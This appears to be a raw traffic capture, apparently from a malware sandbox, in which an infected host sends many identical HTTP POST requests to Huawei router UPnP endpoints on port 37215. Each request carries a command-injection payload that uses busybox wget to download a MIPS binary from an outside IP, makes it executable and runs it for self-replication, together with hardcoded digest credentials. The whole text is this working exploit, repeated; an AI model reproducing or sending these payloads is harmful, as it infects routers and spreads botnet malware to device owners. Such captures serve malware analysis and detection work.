                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.490330935 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    78192.168.2.1441576197.52.39.1737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.144777060 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.490330935 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    79192.168.2.144057641.189.126.25137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.144778013 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.496558905 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    80192.168.2.144104241.115.148.837215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.148083925 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.508522034 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    81192.168.2.1442784197.83.244.9137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.148653030 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.547111988 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    82192.168.2.1442728139.13.35.18437215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.149843931 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
